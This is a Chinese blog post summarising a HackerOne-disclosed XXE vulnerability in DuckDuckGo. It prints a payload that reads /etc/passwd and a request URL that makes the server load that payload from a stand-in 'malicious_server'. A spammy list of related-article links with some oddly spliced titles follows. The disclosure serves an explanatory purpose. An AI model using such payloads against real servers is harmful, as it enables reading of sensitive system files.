DuckDuckGo搜索引擎的XXE漏洞

访客4年前黑客工具526

近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。


DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。


漏洞详情


漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。


只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。


而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。


具体步骤如下


1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。


<?xm l version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>


2.直接访问链接https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xml


3.返回的页面可以看到xm l文件解析结果


DuckDuckGo搜索引擎的XXE漏洞

相关文章

答题赚钱每题5元(答题赚钱软件排行榜)

答题赚钱每题5元(答题赚钱软件排行榜)

趣问 APP 玩法详细介绍 1 , 总体介绍: 证 会员注册并且实名认证 ( 免费) )务 后可以领取一个免费任务 ( 脑 筋急转弯)每天做 3 道题并且答对后可以得 0.3 个饼干。卖 出...

疫情下的数据探测背后,搜索与民意在“共振”

疫情下的数据探测背后,搜索与民意在“共振”

一场席卷而来的疫情让国人的春节假期变得漫长而又焦虑,疫情叠加春节让人们有了更多时间安静下来深度思考。而从互联网领域来看,抗疫之后,曾经的“搜索”价值重回视线。 多样化的信息获取方式,极大丰富了用户行...

黑客入侵美国导弹系统是什么电影(顶级黑客入侵美国导弹系统是什么电影)

黑客入侵美国导弹系统是什么电影(顶级黑客入侵美国导弹系统是什么电影)

本文导读目录: 1、求一部电影名字,好象有杰森·斯坦森,讲述的是黑客入侵美国国家系统,貌似分三步 求速答 2、刚看了一部电影,忘记名字了!美国片子!一个中学生小孩是个黑客,黑进了美国国防部,和智能...

发别人微信文件找黑客-黑客壁纸 高清(黑客壁纸高清1080)

发别人微信文件找黑客-黑客壁纸 高清(黑客壁纸高清1080)

发别人微信文件找黑客相关问题 怎样成为网络黑客高手相关问题 以下什么是黑客入侵的常用手段 黑客技术自学方法(自学黑客技术入门)...

书写新时代全面泰民孙娜恩依法治国新篇章

  书写新时代全面依法治国新篇章   全面依法治国是坚持和发展中国特色社会主义的本质要求和重要保障,事关我们党执政兴国,事关人民幸福安康,事关党和国家事业发展。在协调推进“四个全面”战略布局中,全面...

少年励志文章(关于少年励志的文章)

少年励志文章(关于少年励志的文章) 人的一生是短暂的,如何在不同的阶段做好应该做的事,决定了生命的厚度。 01 少年拼命 吃得苦中苦,方为人上人。这是颠扑不破的真理。 要想事业有所作为,少年时...